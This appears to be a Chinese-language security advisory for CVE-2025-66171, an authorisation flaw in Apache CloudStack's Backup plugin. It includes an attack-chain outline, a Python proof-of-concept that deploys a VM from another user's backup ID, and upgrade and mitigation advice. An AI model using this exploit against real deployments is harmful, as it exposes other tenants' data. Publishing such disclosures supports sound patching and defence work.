CVE-2025-66171 CVSS 6.5 中危

CVE-2025-66171 Apache CloudStack权限绕过漏洞

披露日期: 2026-05-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-66171

漏洞类型

权限提升

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apache CloudStack

漏洞概述

Apache CloudStack Backup插件在4.21.0.0及4.22.0.0版本中存在访问控制逻辑缺陷。由于插件未对API请求中的备份所有权进行严格验证，任何经过身份认证的用户均可利用特定API访问其他用户的备份，并使用这些敏感数据创建新的虚拟机。该漏洞破坏了多租户环境下的数据隔离，存在严重的数据泄露风险。

技术细节

该漏洞的核心在于CloudStack Backup插件在处理备份恢复或虚拟机创建请求时，缺乏对资源归属权的校验。在受影响的版本中，系统仅验证了请求者的用户身份，但未验证请求中引用的Backup ID是否属于该用户。攻击者可以通过遍历ID或利用信息泄露接口获取其他用户的Backup ID，随后调用创建虚拟机的API，将参数中的备份ID指定为目标用户的ID。服务器端接受请求后，会解析备份内容并启动新虚拟机，从而导致数据泄露及资源被非授权占用。

攻击链分析

STEP 1

Reconnaissance

攻击者探测目标环境，确认CloudStack版本及Backup插件是否启用。

STEP 2

Authentication

攻击者使用获取的低权限用户凭证登录CloudStack管理接口。

STEP 3

Enumeration

攻击者尝试枚举或猜测其他用户的备份ID（Backup ID）。

STEP 4

Exploitation

攻击者向特定API发送请求，将备份ID参数设置为受害者的ID，尝试创建虚拟机。

STEP 5

Impact

服务器验证通过，使用受害者的备份创建新虚拟机，攻击者获得数据访问权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Apache CloudStack Backup Plugin Privilege Escalation PoC
# Date: 2025-05-08
# Vulnerable Version: 4.21.0.0, 4.22.0.0

TARGET_URL = "https://<cloudstack-ip>:<port>/client/api"
API_KEY = "<attacker_api_key>"
SECRET_KEY = "<attacker_secret_key>"
# The victim's backup ID that the attacker wants to use
VICTIM_BACKUP_ID = "<victim_backup_id>" 

def create_vm_from_stolen_backup():
    """
    Exploits the improper access logic to create a VM using another user's backup.
    """
    payload = {
        "command": "deployVirtualMachine",
        "apiKey": API_KEY,
        "response": "json",
        "serviceofferingid": "<small_service_offering_id>",
        "zoneid": "<zone_id>",
        # Vulnerable parameter: specifying a backup ID owned by another user
        "backupid": VICTIM_BACKUP_ID 
    }
    
    # Sign request logic omitted for brevity (standard CloudStack API signing)
    # signature = calculate_signature(payload, SECRET_KEY)
    # payload["signature"] = signature
    
    try:
        response = requests.get(TARGET_URL, params=payload, verify=False)
        if response.status_code == 200 and "virtualmachine" in response.text:
            print("[+] Exploit successful! VM created using victim's backup.")
            print(response.json())
        else:
            print("[-] Exploit failed or invalid response.")
            print(response.text)
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    create_vm_from_stolen_backup()

影响范围

Apache CloudStack 4.21.0.0

Apache CloudStack 4.22.0.0

防御指南

临时缓解措施

建议用户立即升级至Apache CloudStack 4.22.0.1版本以修复此漏洞。若无法立即升级，应暂时禁用Backup插件，并严格限制普通用户对创建虚拟机及备份相关API的访问权限，确保只有管理员才能操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表